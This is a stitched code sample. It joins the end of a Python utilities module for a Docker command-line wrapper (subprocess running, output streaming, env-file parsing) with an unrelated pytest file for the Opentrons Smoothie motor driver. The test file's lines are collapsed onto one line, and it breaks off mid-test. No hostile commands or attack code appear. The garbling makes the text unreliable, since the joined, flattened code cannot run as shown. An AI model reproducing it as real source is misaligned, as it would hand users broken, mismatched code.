            "ipv6_gateway": "IPv6Gateway",
            "network_id": "NetworkID",
            "ip_address": "IPAddress",
            "global_ipv6_address": "GlobalIPv6Address",
            "blkio_device_read_iops": "BlkioDeviceReadIOps",
            "blkio_device_write_iops": "BlkioDeviceWriteIOps",
            "device_ids": "DeviceIDs",
            "kernel_memory_tcp": "KernelMemoryTCP",
            "container_id_file": "ContainerIDFile",
            "uts_mode": "UTSMode",
            "root_fs": "RootFS",
            "enable_ipv6": "EnableIPv6",
            "ipv4_address": "IPv4Address",
            "ipv6_address": "IPv6Address",
            "ipam": "IPAM",
            "tls_info": "TLSInfo",
            "virtual_ips": "VirtualIPs",
        }
        return special_cases[string]
    except KeyError:
        return "".join(title_if_necessary(x) for x in string.split("_"))


class DockerCamelModel(pydantic.BaseModel):
    class Config:
        alias_generator = to_docker_camel
        allow_population_by_field_name = True


def run(
    args: List[Any],
    capture_stdout: bool = True,
    capture_stderr: bool = True,
    input: bytes = None,
    return_stderr: bool = False,
    env: Dict[str, str] = {},
) -> Union[str, Tuple[str, str]]:
    args = [str(x) for x in args]
    subprocess_env = dict(os.environ)
    subprocess_env.update(env)
    if args[1] == "buildx":
        subprocess_env["DOCKER_CLI_EXPERIMENTAL"] = "enabled"
    if capture_stdout:
        stdout_dest = subprocess.PIPE
    else:
        stdout_dest = None
    if capture_stderr:
        stderr_dest = subprocess.PIPE
    else:
        stderr_dest = None
    if os.environ.get("PYTHON_ON_WHALES_DEBUG", "0") == "1":
        print("------------------------------")
        print("command: " + " ".join(args))
        print(f"Env: {subprocess_env}")
        print("------------------------------")
    completed_process = subprocess.run(
        args, input=input, stdout=stdout_dest, stderr=stderr_dest, env=subprocess_env
    )

    if completed_process.returncode != 0:
        if completed_process.stderr is not None:
            if "no such image" in completed_process.stderr.decode().lower():
                raise NoSuchImage(
                    args,
                    completed_process.returncode,
                    completed_process.stdout,
                    completed_process.stderr,
                )
            if "no such service" in completed_process.stderr.decode().lower():
                raise NoSuchService(
                    args,
                    completed_process.returncode,
                    completed_process.stdout,
                    completed_process.stderr,
                )
        raise DockerException(
            args,
            completed_process.returncode,
            completed_process.stdout,
            completed_process.stderr,
        )

    if return_stderr:
        return (
            post_process_stream(completed_process.stdout),
            post_process_stream(completed_process.stderr),
        )
    else:
        return post_process_stream(completed_process.stdout)


def post_process_stream(stream: Optional[bytes]):
    if stream is None:
        return ""
    stream = stream.decode()
    if len(stream) != 0 and stream[-1] == "\n":
        stream = stream[:-1]
    return stream


ValidPath = Union[str, Path]


def to_list(x) -> list:
    if isinstance(x, list):
        return x
    else:
        return [x]


# backport of https://docs.python.org/3.9/library/stdtypes.html#str.removesuffix
def removesuffix(string: str, suffix: str) -> str:
    # Guard against an empty suffix: string[:-0] would return '' instead of string.
    if suffix and string.endswith(suffix):
        return string[: -len(suffix)]
    else:
        return string


def removeprefix(string: str, prefix: str) -> str:
    if string.startswith(prefix):
        return string[len(prefix):]
    else:
        return string


def reader(pipe, pipe_name, queue):
    try:
        with pipe:
            for line in iter(pipe.readline, b""):
                queue.put((pipe_name, line))
    finally:
        queue.put(None)


def stream_stdout_and_stderr(full_cmd: list) -> Iterable[Tuple[str, bytes]]:
    full_cmd = list(map(str, full_cmd))
    process = Popen(full_cmd, stdout=PIPE, stderr=PIPE)

    q = Queue()
    full_stderr = b""  # for the error message
    Thread(target=reader, args=[process.stdout, "stdout", q]).start()
    Thread(target=reader, args=[process.stderr, "stderr", q]).start()
    for _ in range(2):
        for source, line in iter(q.get, None):
            yield source, line
            if source == "stderr":
                full_stderr += line

    exit_code = process.wait()
    if exit_code != 0:
        raise DockerException(full_cmd, exit_code, stderr=full_stderr)


def format_dict_for_cli(dictionary: Dict[str, str], separator="="):
    return [f"{key}{separator}{value}" for key, value in dictionary.items()]


def read_env_file(env_file: Path) -> Dict[str, str]:
    result_dict = {}
    for line in env_file.read_text().splitlines():
        line = line.strip()
        try:
            first_sharp = line.index("#")
        except ValueError:
            pass
        else:
            line = line[:first_sharp]
        if not line:
            continue
        line = line.strip()
        # Split on the first '=' only, so values may themselves contain '='.
        key, value = line.split("=", 1)
        result_dict[key] = value
    return result_dict


def read_env_files(env_files: List[Path]) -> Dict[str, str]:
    result_dict = {}
    for file in env_files:
        result_dict.update(read_env_file(file))
    return result_dict


def all_fields_optional(cls):
    """Decorator function used to modify a pydantic model's fields to all be optional."""
    for field in cls.__fields__.values():
        field.required = False
        field.allow_none = True
    return cls
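A short sketch of the helpers above in use; it assumes a working docker binary on PATH, and the exceptions raised are the ones defined in python_on_whales.exceptions:

# Run a command and capture stdout (raises DockerException on failure).
version = run(["docker", "version", "--format", "{{.Client.Version}}"])
print(version)

# Stream interleaved stdout/stderr lines as they arrive.
for source, line in stream_stdout_and_stderr(["docker", "pull", "alpine"]):
    print(source, line.decode(), end="")

print(format_dict_for_cli({"FOO": "bar"}))  # -> ['FOO=bar']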
test_driver.py
from copy import deepcopy from threading import Thread from unittest.mock import Mock import pytest from time import sleep from numpy import isclose from opentrons.trackers import pose_tracker from tests.opentrons.conftest import fuzzy_assert from opentrons.config.robot_configs import ( DEFAULT_GANTRY_STEPS_PER_MM, DEFAULT_PIPETTE_CONFIGS) from opentrons.drivers import serial_communication, utils, types from opentrons.drivers.smoothie_drivers import driver_3_0 def position(x, y, z, a, b, c): return {axis: value for axis, value in zip('XYZABC', [x, y, z, a, b, c])} def test_update_position(smoothie, monkeypatch): driver = smoothie def _new_send_message(self, command, timeout=None): return 'ok MCS: X:0.0000 Y:0.0000 Z:0.0000 A:0.0000 B:0.0000 C:0.0000' monkeypatch.setattr(driver, '_send_command', _new_send_message) driver.update_position() expected = { 'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0 } assert driver.position == expected count = 0 def _new_send_message2(self, command, timeout=None): nonlocal count # first attempt to read, we get bad data msg = 'ok MCS: X:0.0000 Y:MISTAKE Z:0.0000 A:0.0000 B:0.0000 C:0.0000' if count > 0: # any following attempts to read, we get good data msg = msg.replace('Y:MISTAKE', 'Y:0.0000') count += 1 return msg monkeypatch.setattr(driver, '_send_command', _new_send_message2) driver.update_position() expected = { 'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0 } assert driver.position == expected def test_remove_serial_echo(smoothie, monkeypatch): smoothie.simulating = False def return_echo_response(command, ack, connection, timeout, tag=None): if 'some-data' in command: return command + 'TESTS-RULE' return command monkeypatch.setattr(serial_communication, 'write_and_return', return_echo_response) cmd = 'G28.2B' res = smoothie._send_command( cmd, driver_3_0.SMOOTHIE_ACK) assert res == '' res = smoothie._send_command( '\r\n' + cmd + '\r\n\r\n', driver_3_0.SMOOTHIE_ACK) assert res == '' res = smoothie._send_command( '\r\n' + cmd + '\r\n\r\nsome-data\r\nok\r\n', driver_3_0.SMOOTHIE_ACK) assert res == 'TESTS-RULE' def return_echo_response(command, ack, connection, timeout, tag=None): if 'some-data' in command: return command.strip() + '\r\nT\r\nESTS-RULE' return command monkeypatch.setattr(serial_communication, 'write_and_return', return_echo_response) res = smoothie._send_command( '\r\n' + cmd + '\r\n\r\nsome-data\r\nok\r\n', driver_3_0.SMOOTHIE_ACK) assert res == 'TESTS-RULE' def test_parse_position_response(smoothie): good_data = 'ok M114.2 X:10 Y:20: Z:30 A:40 B:50 C:60' bad_data = 'ok M114.2 X:10 Y:20: Z:30A:40 B:50 C:60' res = driver_3_0._parse_position_response(good_data) expected = { 'X': 10, 'Y': 20, 'Z': 30, 'A': 40, 'B': 50, 'C': 60, } assert res == expected with pytest.raises(driver_3_0.ParseError): driver_3_0._parse_position_response(bad_data) def test_dwell_and_activate_axes(smoothie, monkeypatch): command_log = [] smoothie._setup() smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def _parse_position_response(arg): return smoothie.position monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.activate_axes('X') smoothie._set_saved_current() smoothie.dwell_axes('X') smoothie._set_saved_current() smoothie.activate_axes('XYBC') smoothie._set_saved_current() smoothie.dwell_axes('XC') smoothie._set_saved_current() 
smoothie.dwell_axes('BCY') smoothie._set_saved_current() expected = [ ['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M907 A0.1 B0.05 C0.05 X1.25 Y1.25 Z0.1 G4P0.005'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4P0.005'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_disable_motor(smoothie, monkeypatch): command_log = [] smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def _parse_position_response(arg): return smoothie.position monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.disengage_axis('X') smoothie.disengage_axis('XYZ') smoothie.disengage_axis('ABCD') expected = [ ['M18X'], ['M400'], ['M18[XYZ]+'], ['M400'], ['M18[ABC]+'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_plunger_commands(smoothie, monkeypatch): command_log = [] smoothie._setup() smoothie.home() smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def _parse_position_response(arg): return smoothie.position monkeypatch.setattr( serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.home() expected = [ ['M907 A0.8 B0.05 C0.05 X0.3 Y0.3 Z0.8 G4P0.005 G28.2.+[ABCZ].+'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M203.1 Y50'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.8 Z0.1 G4P0.005 G91 G0Y-28 G0Y10 G90'], ['M400'], ['M203.1 X80'], ['M400'], ['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4P0.005 G28.2X'], ['M400'], ['M203.1 A125 B40 C40 X600 Y400 Z125'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M203.1 Y80'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4P0.005 G28.2Y'], ['M400'], ['M203.1 Y8'], ['M400'], ['G91 G0Y-3 G90'], ['M400'], ['G28.2Y'], ['M400'], ['G91 G0Y-3 G90'], ['M400'], ['M203.1 A125 B40 C40 X600 Y400 Z125'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M114.2'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) command_log = [] smoothie.move({'X': 0, 'Y': 1.123456, 'Z': 2, 'A': 3}) expected = [ ['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4P0.005 G0.+'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) command_log = [] smoothie.move({'B': 2}) expected = [ ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B2'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) command_log = [] smoothie.move({ 'X': 10.987654321, 'Y': 2.12345678, 'Z': 2.5, 'A': 3.5, 'B': 4.25, 'C': 5.55}) expected = [ # Set active axes high ['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4P0.005 G0.+[BC].+'], # noqa(E501) ['M400'], # Set plunger current low ['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4P0.005'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_set_active_current(smoothie, monkeypatch): command_log = [] smoothie._setup() smoothie.home() smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def 
_parse_position_response(arg): return smoothie.position monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.set_active_current( {'X': 2, 'Y': 2, 'Z': 2, 'A': 2, 'B': 2, 'C': 2}) smoothie.set_dwelling_current( {'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0}) smoothie.move({'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0}) smoothie.move({'B': 1, 'C': 1}) smoothie.set_active_current({'B': 0.42, 'C': 0.42}) smoothie.home('BC') expected = [ # move all ['M907 A2 B2 C2 X2 Y2 Z2 G4P0.005 G0A0B0C0X0Y0Z0'], ['M400'], ['M907 A2 B0 C0 X2 Y2 Z2 G4P0.005'], # disable BC axes ['M400'], # move BC ['M907 A0 B2 C2 X0 Y0 Z0 G4P0.005 G0B1.3C1.3 G0B1C1'], ['M400'], ['M907 A0 B0 C0 X0 Y0 Z0 G4P0.005'], # disable BC axes ['M400'], ['M907 A0 B0.42 C0.42 X0 Y0 Z0 G4P0.005 G28.2BC'], # home BC ['M400'], ['M907 A0 B0 C0 X0 Y0 Z0 G4P0.005'], # dwell all axes after home ['M400'], ['M114.2'], # update the position ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_steps_per_mm(smoothie, monkeypatch): # Check that steps_per_mm dict gets loaded with defaults on start assert smoothie.steps_per_mm == {} smoothie._setup() expected = { **DEFAULT_GANTRY_STEPS_PER_MM, 'B': DEFAULT_PIPETTE_CONFIGS['stepsPerMM'], 'C': DEFAULT_PIPETTE_CONFIGS['stepsPerMM'], } assert smoothie.steps_per_mm == expected smoothie.update_steps_per_mm({'Z': 450}) expected['Z'] = 450 assert smoothie.steps_per_mm == expected def test_pipette_configs(smoothie, monkeypatch): axis_value = 'home updated 175' smoothie._send_command = Mock(return_value=axis_value) res = smoothie.update_pipette_config('Z', {'home': 175}) expected_return = {'Z': {'home': 175}} assert res == expected_return def test_set_acceleration(smoothie, monkeypatch): command_log = [] smoothie._setup() smoothie.home() smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def _parse_position_response(arg): return smoothie.position monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.set_acceleration( {'X': 1, 'Y': 2, 'Z': 3, 'A': 4, 'B': 5, 'C': 6}) smoothie.push_acceleration() smoothie.pop_acceleration() smoothie.set_acceleration( {'X': 10, 'Y': 20, 'Z': 30, 'A': 40, 'B': 50, 'C': 60}) smoothie.pop_acceleration() expected = [ ['M204 S10000 A4 B5 C6 X1 Y2 Z3'], ['M400'], ['M204 S10000 A4 B5 C6 X1 Y2 Z3'], ['M400'], ['M204 S10000 A40 B50 C60 X10 Y20 Z30'], ['M400'], ['M204 S10000 A4 B5 C6 X1 Y2 Z3'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_active_dwelling_current_push_pop(smoothie): assert smoothie._active_current_settings != \ smoothie._dwelling_current_settings old_active_currents = deepcopy(smoothie._active_current_settings) old_dwelling_currents = deepcopy(smoothie._dwelling_current_settings) smoothie.push_active_current() smoothie.set_active_current({'X': 2.0, 'Y': 2.0, 'Z': 2.0, 'A': 2.0}) smoothie.pop_active_current() assert smoothie._active_current_settings == old_active_currents assert smoothie._dwelling_current_settings == old_dwelling_currents def test_functional(smoothie): assert smoothie.position == position(0, 0, 0, 0, 0, 0) smoothie.move({'X': 0, 'Y': 1, 'Z': 2, 'A': 3, 'B': 4, 'C': 5}) assert smoothie.position == position(0, 1, 2, 3, 4, 5) smoothie.move({'X': 1, 'Z': 3, 'C': 6}) 
assert smoothie.position == position(1, 1, 3, 3, 4, 6) smoothie.home(axis='abc', disabled='') assert smoothie.position == position( 1, 1, 3, smoothie.homed_position['A'], smoothie.homed_position['B'], smoothie.homed_position['C']) smoothie.home(disabled='') assert smoothie.position == smoothie.homed_position @pytest.mark.api1_only def test_set_pick_up_current(model, monkeypatch): driver = model.robot._driver set_current = driver._save_current current_log = [] def set_current_mock(target, axes_active=True): nonlocal current_log current_log.append(target) set_current(target, axes_active) monkeypatch.setattr(driver, '_save_current', set_current_mock) driver.update_homed_flags({ax: True for ax in 'XYZABC'}) rack = model.robot.add_container('tiprack-200ul', '10') pipette = model.instrument._instrument pipette.set_pick_up_current(0.42) pipette.pick_up_tip(rack[0], presses=1) # Instrument in `model` is configured to right mount, which is the A axis # on the Smoothie (see `Robot._actuators`) expected = [ {'C': 0.5}, {'C': 0.05}, {'A': 0.8}, {'A': 0.1}, {'X': 1.25, 'Y': 1.25}, {'X': 0.3, 'Y': 0.3}, {'A': 0.8}, {'A': 0.42}, {'A': 0.8}, {'A': 0.1} ] assert current_log == expected @pytest.mark.xfail @pytest.mark.api1_only def test_drop_tip_current(model, monkeypatch): # TODO: All of these API 1 tests either need to be removed or moved to # a different test file. The ones using the model fixture rely on # some ugly things created in RPC. Ideally, all of these tests should # be testing methods in the smoothie directly. driver = model.driver old_save_current = driver._save_current current_log = [] def mock_save_current(settings, axes_active=True): nonlocal current_log if 'C' in settings: current_log.append(settings) old_save_current(settings, axes_active) monkeypatch.setattr(driver, '_save_current', mock_save_current) rack = model.robot.add_container('tiprack-200ul', '10') pipette = model.instrument._instrument pipette._plunger_current = 0.123 pipette._drop_tip_current = 0.456 pipette.drop_tip(rack[0]) # Instrument in `model` is configured to right mount, which is the A axis # on the Smoothie (see `Robot._actuators`) expected = [ {'C': 0.123}, # move to 'bottom' position {'C': 0.05}, # dwell {'C': 0.456}, # move to 'drop_tip' position {'C': 0.05}, # dwell {'C': 0.123}, # fast-home move upwards {'C': 0.05}, # dwell {'C': 0.123}, # fast-home home command {'C': 0.05}, # dwell {'C': 0.123}, # move back to 'bottom' position {'C': 0.05} # dwell ] assert current_log == expected def test_parse_pipette_data(): msg = 'TestsRule!!' mount = 'L' good_data = mount + ': ' \ + driver_3_0._byte_array_to_hex_string(msg.encode()) parsed = driver_3_0._parse_instrument_data(good_data).get(mount) assert parsed.decode() == msg def test_read_and_write_pipettes(smoothie, monkeypatch): driver = smoothie written_id = '' written_model = '' mount = 'L' def _new_send_message( command, timeout=None, suppress_error_msg=True): nonlocal written_id, written_model, mount if driver_3_0.GCODES['READ_INSTRUMENT_ID'] in command: return mount + ': ' + written_id elif driver_3_0.GCODES['READ_INSTRUMENT_MODEL'] in command: return mount + ': ' + written_model if driver_3_0.GCODES['WRITE_INSTRUMENT_ID'] in command: written_id = command[command.index(mount) + 1:] elif driver_3_0.GCODES['WRITE_INSTRUMENT_MODEL'] in command: written_model = command[command.index(mount) + 1:] monkeypatch.setattr(driver, '_send_command', _new_send_message) test_id = 'TestsRock!!' 
test_model = 'TestPipette' driver.write_pipette_id('left', test_id) driver.simulating = False read_id = driver.read_pipette_id('left') driver.simulating = True assert read_id == test_id driver.write_pipette_model('left', test_model) driver.simulating = False read_model = driver.read_pipette_model('left') driver.simulating = True assert read_model == test_model + '_v1' def test_read_pipette_v13(smoothie, monkeypatch): driver = smoothie driver.simulating = False def _new_send_message( command, timeout=None, suppress_error_msg=True): return 'L:' + driver_3_0._byte_array_to_hex_string(b'p300_single_v13') monkeypatch.setattr(driver, '_send_command', _new_send_message) res = driver.read_pipette_model('left') assert res == 'p300_single_v1.3' def test_fast_home(smoothie, monkeypatch): driver = smoothie move = driver.move coords = [] def move_mock(target): nonlocal coords coords.append(target) move(target) monkeypatch.setattr(driver, 'move', move_mock) assert coords == [] driver.fast_home(axis='X', safety_margin=12) assert coords == [{'X': driver.homed_position['X'] - 12}] assert driver.position['X'] == driver.homed_position['X'] def test_homing_flags(smoothie, monkeypatch): driver = smoothie def is_connected_mock(): return True monkeypatch.setattr(driver, 'is_connected', is_connected_mock) driver.simulating = False def send_mock(target): smoothie_homing_res = 'X:0 Y:1 Z:0 A:1 B:0 C:1\r\n' return smoothie_homing_res monkeypatch.setattr(driver, '_send_command', send_mock) expected = { 'X': False, 'Y': True, 'Z': False, 'A': True, 'B': False, 'C': True } driver.update_homed_flags() flags = driver.homed_flags assert flags == expected def test_switch_state(smoothie, monkeypatch): driver = smoothie def send_mock(target): smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:0 B_max:0 C_max:0' smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 0\r\n' return smoothie_switch_res monkeypatch.setattr(driver, '_send_command', send_mock) expected = { 'X': False, 'Y': False, 'Z': False, 'A': False, 'B': False, 'C': False, 'Probe': False } assert driver.switch_state == expected def send_mock(target): smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:1 B_max:0 C_max:0' smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 1\r\n' return smoothie_switch_res monkeypatch.setattr(driver, '_send_command', send_mock) expected = { 'X': False, 'Y': False, 'Z': False, 'A': True, 'B': False, 'C': False, 'Probe': True } assert driver.switch_state == expected def test_clear_limit_switch(smoothie, monkeypatch): """ This functions as a contract test around recovery from a limit-switch hit. Note that this *does not* itself guarantee correct physical behavior--this interaction has been designed and tested on the robot manually and then encoded in this test. If requirements change around physical behavior, then this test will need to be revised. 
""" driver = smoothie driver.home('xyza') cmd_list = [] def write_mock(command, ack, serial_connection, timeout, tag=None): nonlocal cmd_list cmd_list.append(command) if driver_3_0.GCODES['MOVE'] in command: return "ALARM: Hard limit +C" elif driver_3_0.GCODES['CURRENT_POSITION'] in command: return 'ok M114.2 X:10 Y:20: Z:30 A:40 B:50 C:60' else: return "ok" monkeypatch.setattr(serial_communication, 'write_and_return', write_mock) driver.simulating = False # This will cause a limit-switch error and not back off with pytest.raises(driver_3_0.SmoothieError): driver.move({'C': 100}) assert [c.strip() for c in cmd_list] == [ # attempt to move and fail 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0C100.3 G0C100', # noqa(E501) # recover from failure 'M999', 'M400', # set current for homing the failed axis (C) 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G28.2C', 'M400', # set current back to idling after home 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'M400', # update position 'M114.2', 'M400', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'M400', ] @pytest.mark.api1_only def test_pause_resume(model): """ This test has to use an ugly work-around with the `simulating` member of the driver. When issuing movement commands in test, `simulating` should be True, but when testing whether `pause` actually pauses and `resume` resumes, `simulating` must be False. """ pipette = model.instrument._instrument robot = model.robot robot.home() homed_coords = pose_tracker.absolute(robot.poses, pipette) robot._driver.simulating = False robot.pause() robot._driver.simulating = True def _move_head(): robot.poses = pipette._move(robot.poses, x=100, y=0, z=0) thread = Thread(target=_move_head) thread.start() sleep(0.5) # Check against home coordinates before calling resume to ensure that robot # doesn't move while paused coords = pose_tracker.absolute(robot.poses, pipette) assert isclose(coords, homed_coords).all() robot._driver.simulating = False robot.resume() robot._driver.simulating = True thread.join() coords = pose_tracker.absolute(robot.poses, pipette) expected_coords = (100, 0, 0) assert isclose(coords, expected_coords).all() def test_speed_change(robot, instruments, monkeypatch): ulmm = { "aspirate": [[100, 0, 0.5]], "dispense": [[100, 0, 0.5]] } pipette = instruments.Pipette(mount='right', ul_per_mm=ulmm) robot._driver.simulating = False command_log = [] def write_with_log(command, ack, connection, timeout, tag=None): if 'G0F' in command: command_log.append(command.strip()) elif 'M114' in command: return 'ok MCS: X:0.00 Y:0.00 Z:0.00 A:0.00 B:0.00 C:0.00' return driver_3_0.SMOOTHIE_ACK monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) pipette.tip_attached = True pipette.max_volume = 100 pipette._working_volume = 100 pipette.set_speed(aspirate=20, dispense=40) pipette.aspirate(10) pipette.dispense(10) expected = [ ['G0F1200'], # pipette's default aspirate speed in mm/min ['G0F24000'], ['G0F2400'], # pipette's default dispense speed in mm/min ['G0F24000'], ] fuzzy_assert(result=command_log, expected=expected) def test_max_speed_change(robot, smoothie, monkeypatch): smoothie.simulating = False robot._driver = smoothie from opentrons.drivers import serial_communication from opentrons.drivers.smoothie_drivers import driver_3_0 command_log = [] def write_with_log(command, ack, connection, timeout, tag=None): if 'M203.1' in command or 'G0F' in command: command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK monkeypatch.setattr(serial_communication, 
'write_and_return', write_with_log) robot.head_speed(555) robot.head_speed(x=1, y=2, z=3, a=4, b=5, c=6) robot.head_speed(123, x=7) robot._driver.push_speed() robot._driver.set_speed(321) robot._driver.pop_speed() expected = [ ['G0F{}'.format(555 * 60)], ['M203.1 A4 B5 C6 X1 Y2 Z3'], ['M203.1 X7'], ['G0F{}'.format(123 * 60)], ['G0F{}'.format(321 * 60)], ['G0F{}'.format(123 * 60)], ] fuzzy_assert(result=command_log, expected=expected) @pytest.mark.api1_only def test_pause_in_protocol(model): model.robot._driver.simulating = True model.robot.pause() assert model.robot._driver.run_flag.is_set() def test_send_command_with_retry(robot, smoothie, monkeypatch): smoothie.simulating = False robot._driver = smoothie count = 0 def _no_response(command, ack, connection, timeout, tag=None): nonlocal count count += 1 if count < 3: raise serial_communication.SerialNoResponse('No response') else: return 'ok' monkeypatch.setattr(serial_communication, 'write_and_return', _no_response) # force `write_and_return` to raise exception just once count = 0 res = robot._driver._send_command('test') assert res == 'ok' # force `write_and_return` to raise exception twice count = -1 with pytest.raises(serial_communication.SerialNoResponse): robot._driver._send_command('test') def test_unstick_axes(robot, smoothie): import types smoothie.simulating = False robot._driver = smoothie def update_position_mock(self, default=None): if default is None: default = self._position updated_position = self._position.copy() updated_position.update(**default) robot._driver.update_position = types.MethodType( update_position_mock, robot._driver) current_log = [] def send_command_mock(self, command, timeout=12000.0, ack_timeout=5.0): nonlocal current_log current_log.append(command) if 'M119' in command: smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:0 B_max:0 C_max:0' # NOQA smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 0\r\n' # NOQA return smoothie_switch_res robot._driver._send_command = types.MethodType( send_command_mock, robot._driver) robot._driver.unstick_axes('BC') expected = [ 'M203.1 B1 C1', # slow them down 'M119', # get the switch status # move 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B-1C-1', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', # set plunger current 'M203.1 A125 B40 C40 X600 Y400 Z125' # return to normal speed ] assert current_log == expected current_log = [] robot._driver.unstick_axes('XYZA') expected = [ 'M203.1 A1 X1 Y1 Z1', # slow them down 'M119', # get the switch status 'M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4P0.005 G0A-1X-1Y-1Z-1', # noqa(E501) 'M203.1 A125 B40 C40 X600 Y400 Z125' # return to normal speed ] assert current_log == expected def send_command_mock(self, command, timeout=12000.0, ack_timeout=5.0): nonlocal current_log current_log.append(command) if 'M119' in command: smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:0 B_max:0 C_max:1' # NOQA smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 0\r\n' # NOQA return smoothie_switch_res robot._driver._send_command = types.MethodType( send_command_mock, robot._driver) current_log = [] robot._driver.unstick_axes('BC') expected = [ 'M203.1 B1 C1', # set max-speeds 'M119', # get switch status # MOVE B 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B-2', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', # low current B 
